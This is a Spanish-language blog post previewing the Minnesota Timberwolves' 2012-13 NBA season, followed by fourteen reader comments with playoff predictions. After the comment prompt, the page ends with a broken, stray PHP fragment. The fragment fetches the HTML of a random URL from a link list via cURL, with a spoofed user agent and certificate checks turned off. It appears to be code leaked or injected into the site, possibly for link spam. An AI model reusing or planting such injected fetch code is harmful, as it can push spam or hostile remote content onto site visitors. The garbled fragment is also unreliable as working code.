Minnesota Timberwolves: Afilando los colmillos

03 de October de 2012 por TheDeerHunter

Estupendas sensaciones las que nos transmiten los Wolves. ¿Exageradas quizás teniendo en cuenta las 26 victorias y la cuchara de madera de la Northwest? No lo creo.

Corto y pego del resumen de la temporada: “Durante los primeros meses de competición los Wolves eran la sensación del campeonato”. Los parroquianos del Target Center se frotaban los ojos. Rara vez ese frío pabellón ha vibrado tanto. Ni remotamente parecido desde la 2003/04. USA alucinaba con la que estaban liando Love, “Pek”, Ricky y compañía. Adelman mola bastante cuando hace jugar a los suyos.

Aquí también nos pegó la fiebre de lleno, con ciertas ganas de que le fuera bien al chaval del Masnou y esa ristra de partidazos antológicos que nos brindaron. Principal causa de insomnio y/o problemas conyugales para tanta gente… también de cambio “chaquetero” de camiseta para unos cuantos (no me miro a nadie)

Un equipo con Milicic, Beasley, Brad Miller, Wes Johnson… caía simpático. Quién lo hubiera dicho.

Lo malo es que entrado Marzo se rompía Ricky inaugurando una racha tremenda de problemas físicos y malos resultados. La caída de nuevo a la realidad. Quien más y quien menos tenía en la cabeza que la plantilla podía resultar algo corta, sobre todo si cuentas con determinados elementos, claves a priori, pero que rara vez reman con el viento en contra.

Por eso se antoja positiva la limpia de vestuario que se ha hecho este verano. Beasley, Wes Johnson, Webster, Ellington formaron el curso pasado uno de los perímetros más ineficaces a la par que decepcionantes de toda la liga. Ni siquiera debería mencionar a Milicic, volviendo a cortocircuitarse incluso tras la lesión de Pekovic (pero con 7 kilitos adicionales por cobrar en la amnistía). Del resto tanto da una cosa como la otra. No deberían echar mucho de menos a ninguno.

Las incorporaciones no es que sean la bomba. Sí lo serían si Roy se pone a dar 20 minutos a su nivel o se hubiera confirmado el pelotazo de birlarle a Batum a los Blazers. Kirilenko cumplirá, aunque sobrepagado, Shved es buen proyecto, Budinger y Cunningham pueden ser útiles pero no suponen un salto de calidad definitivo. Con todo, teniendo en cuenta tanto lo que se quitan de encima como lo que entra, salen ganando claramente.

Suponiendo el regreso a su nivel de Ricky los Wolves mantienen todas sus virtudes y corrigen algunos de sus defectos. Creo sinceramente que mejorarán lo del año pasado a poco que se pongan. Ahora, si Derrick Williams comienza a justificar su pick, Roy nos recuerda lo que fue y/o Shved aterriza con buen pie en la liga podrían ser un peligroso tapado de primera ronda.

Quinteto: Rubio, Budinger, Kirilenko, Love, Pekovic
6º hombre: Derrick Williams/Ridnour

Altas: Kirilenko, Budinger, Roy, Alexey Shved, Cunningham, Stiemsma, Amundson
Bajas: Beasley, Wesley Johnson, Webster, Anthony Randolph, Milicic, Ellington, Tolliver, Brad Miller.

Pronóstico: >50% victorias. 7ª-8ª plaza del Oeste

Comenta

14 comentarios a esta entrada

  1. Nacho dice:
    #1

    Si Adelman con Shevd tiene el mismo tacto que con Ricky, y el ruso (no olvidemos la ayuda que en esto le puede dar AK47) se pone a jugar, puede ser una de las grandes sorpresas de la temporada.
    La segunda unidad de la pintura es de la que pone güevos, y eso es interesante. 15 minutos de Roy a un 70% de lo que era, también es mucho. Si a Kirilenko le da por asumir galones en defensa y vestuario, tendrán una garra tremenda.
    El problema será cómo lleguen a diciembre sin Ricky. (Qué bien les hubiese venido este año el Lockout)
    Lo más interesante del análisis que haces Deer, es el quinteto.
    El primer quinteto blanco (rubios, pelirrojos, morenos, macarras de barrio…), ¿en cuánto tiempo?

      Citar

  2. GreenPride dice:
    #2

    Bueno para mí este equipo es una incógnita. Ricky dio un subidón de adrenalina el año pasado pero hay que ver cómo y cuando vuelve este año y si su efecto dura para esta temporada. Para entonces lo mismo han perdido el ritmo de playoffs o hay malos rollos con un Love que quiere ir a PO como sea este año. También es una incógnita el nivel que les podrá dar Roy y en general sus jugadores exteriores (otra gran incógnita será ver cómo se las apaña Shved). Si todo les va de cara y se ponen todos a jugar serán equipo de PO si no pueden hundirse. AK47 sin duda cumplirá en su vuelta pero ya no está para hacer un año de All-Star y necesitarán que Love sea al menos el del año pasado para poder aspirar a algo. Me gustan sus interiores este año, no son estrellas pero si currantes de los que no te dejan tirado (¿Quien dijo Milicic?). Equipo a seguir sin duda…

      Citar

  3. Sancho88 dice:
    #3

    Muchas ddas tengo yo con Shved. Supongo que necesitarán a una versión aproximada del mejor Roy para aspirar a los playoffs realmente. Con Ricky-Roy-Kirilenko-Love-Pekovic formarían uno de los mejores quintetos titulares de la liga, pero claro, el fondo de armario sigue siendo limitado, para qué engañarnos. Williams debe dar un paso al frente para completar una verdadera rotación de pívots, y en las alas, ni Budinger ni Shved me ofrecen demasiadas confianzas. Budinger, porque símplemente es un tío que cumple, que se abre a la esquina para enchufarlas, la pasa en movimiento perimetral e intimida a sus pares atras, además de rebotear con relativa facilidad, y Shved para mí no es mejor que Rudy, y mira la carrera de Rudy… no sé por qué se crean tan altas espectativas con Shved, un tipo chupón, egoísta, y que no le mola trabajar en equipo. Auguro problemas con Adelman. No sé, seguramente con Ricky sano estos tíos aspiren a playoffs, porque Ricky ha demostrado que es capaz de guiarlos hasta allí si está bien. Pero si Ricky tarda en llegar, pueden empezar los problemas desde el principio. Veremos qué pasa

      Citar

  4. HisRoyalAirness dice:
    #4

    Yo me juego lo que sea a que hacen PO este año. No digo que facilmente pero los hacen.
    Tienen una plantilla equilibrada, calidad, anotación y uno de los 3 o 5 mejores de la liga en Love.

      Citar

  5. Denise dice:
    #5

    Y JJ Barea??? Creo que saldrán con el puertorriqueño de falso “2”

    Yo creo que Shved lo hará bien, su juego es similar al de Ricky, y el juego de NBA le irá mejor que en Europa. Tambien creo que los Wolves jugarán bastante rato con 2 bases, Ricky y Ridnour/Shved/ JJ Barea de falso 2. Como ya muchos decís, depende de como esté Roy pero a priori deberían meterse claramente en Playoffs.

    En quien no tengo tanta confianza es en Derrick Williams.

    Ayer hablabamos de un mal GM, hoy debemos hacerlo de uno bueno, del gran trabajo que ha hecho ese hombre. No es facil ser GM de Minny y atraer a esa ciudad a buenos jugadores, por lo que la relación de altas / bajas que ha habido este verano me parece inmejorable. Beasley, Wesley Johnson y Milicic eran canceres.

    Pronóstico: Claro equipo de playoffs con un balance de 50-32

      Citar

  6. Sancho88 dice:
    #6

    coño, se me había pasado Barea. Yo digo que ahí ahí coqueteando con el 50 x ciento. Venga, les doy un 44-38

      Citar

  7. Esteban dice:
    #7

    me gustan mucho, una verdadera pena que jueguen en el oeste, porque en el este deberian ser candidatos fijos a PO

    en el oeste nunca se sabe, pero a priori podrian serlo,

    se han movido bien en este mercado aunque termino sin entender por q no le ofrecieron el maximo a kevin love y le dan 10 millones por año a kirilenko, INENTENDIBLE

      Citar

  8. melo15 dice:
    #8

    Yo tengo confianza en los Wolves, creo que va a estar en Playoffs y les veo superiores a equipos como Dallas, Phoenix, GSW que seran sus principales rivales.
    La pareja Love-Pekovic es buenisima y si le sumamos a Ricky y Roy (aver como vuelve) y Kirilenko entonces los Wolves tambien tienen un buen perimetro, pero en todo caso no pasaran de 1 Ronda.
    PD: Yo confio en Barea, el año pasado comenzo ml pero despues jugo a un buen nivel y como microondas es muy bueno.

      Citar

  9. Ruxixón dice:
    #9

    Mi equipo este año con permiso de mi idolatrado LeBron pero Love es mucho Love.La parienta me regaló la camiseta de UCLA con el 42 a la espalda así que mi nivel de frikismo proLove está completo,dormiré poco este año,que no se queje,xDD.

    Una vez más confianza máxima en Adelman,veo el entrenador del año o el MVP en Minny esta temporada,así que está claro que apuesto por ellos para la postemporada.A diferencia de vosotros tengo confianza en Derrick Williams,creo que con la partida de Beasley gana mucho,la temporada pasada había minutos que se comían el uno al otro.Creo que hay que tener más dudas con Kirilenko y Roy,vamos a ver qué nivel muestran porque pueden ser el termómetro del equipo.

    Pronóstico: 46-36

      Citar

  10. Sancho88 dice:
    #10

    Dudas con Kirilenko? Ninguna hermano. Ese paisano es de lo mejor en la NBA en cuanto a fundamentos y comprensión del juego, y sabe hacer de todo, y lo va a hacer. Además, cada año diría que va mejorando como jugador de equipo, es alucinante. No se me ocurre nadie mejor que Kirilenko como la pieza que les hacía falta a estos Wolves para asaltar los playoffs. Ricky-Kirilenko-Love son el caparazón, la estructura base, y después vienen los Roy, Williams, Pekovic, Barea, Ridnour, etc. Si Shved y Budinger se adaptan, y sobre todo si Shved demuestra su clase al servicio del equipo, la fórmula de los playoffs estará clara, pero sigo viendo que la estructura es un poco endeble porque no puede fallar nada, como el año pasado mas o menos. A nada que se caiga una viga de todas estas, el equipo va a tomar por culo

      Citar

  11. German dice:
    #11

    Me gusta mucho como quedo el equipo este año. No tengo dudas de que llegaran a Playoffs y ahi pueden molestar a cualquiera, quizas les juegue en contra su falta de experiencia en esas instancias pero ese es otro tema. Que ganas de ver a Ricky de nuevo y tambien a Shved. Confio en que Derrick Williams dara un paso adelante.
    47-35

      Citar

  12. CAMPO2 dice:
    #12

    Yo creo que les falta algo de musculo en el Backcourt, no veo a Roy, Svhed, Ridnour o Barea persiguiendo a escoltas o bases de equipos contrarios un especialista defensivo no les vendría mal

      Citar

  13. nba dice:
    #13

    Evidentemente, mientras ricky no se recupere , el quinteto titular probablemente sera-Ridnour-Barea-AK47-Love-Pekovic, un quinteto apañado, pero nada del otro mundo
    Shved y Roy a dia de hoy son incongnitas, Shved cuenta con la ventaja de tener a AK47 como compañero, lo que probablemente redundara en un claro compromiso y adaptacion desde el principio.
    De Roy, todos sabemos lo que ha sido, pero ahora tenemos que ver que es a dia de hoy.
    DWilliams , ya no tiene a Johnson estorbandole, por lo que esperemos que Adelman lo erija como lider de la segunda unidad, se lo tiene que ganar.
    El resto de compañeros, pues son apañados, pero nada del otro mundo.
    La clave de este equipo son Adelman y Ricky.
    Si el año pasado muchos apostabamos que se harian con la 8 plaza, yo creo que este año si que lo conseguiran, y ademas teniendo en cuenta que Houston se ha pegado varios tiros en el pie.

      Citar

  14. rumbero dice:
    #14

    Hay muchas ganas de ver a los Wolves. Han hecho bien soltando el lastre de piezas secundarias que aportaban muy poquito (o que incluso restaban por ejemplo haciendo mates a falta de 2 segundos cuando tu equipo pierde tres) y se han traido jugadores interesantes y otros que pueden serlo. Budinger es muy del gusto de Adelman y encaja en su sistema… ningun crack pero cuando entró en una rotación medio estable en los Rockets rindió bien. Y de Kirilenko no debería haber muchas dudas por mucho que cobre, cumplirá casi seguro. Luego hay que ver como hace encajar Adelman a Shved…y está Roy que es una auténtica incógnita. Claro, yo recuerdo a este tio fusilando en el último cuarto a Dallas en PO hace un par de años con las rodillas ya hechas polvo y me emocionó. Luego fisícamente tendrá problemas o estará lejos de su nivel, pero como se dice en el análisis 20 minutos suyos si anda bien serian un lujo para los Wolves. Y de los que ya estaban pues igual habría que hablar más de Pekovic, que de seguir al nivel de la temporada pasada va a formar una pareja de. Y está Adelman claro. Se meten en PO. 47-35

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>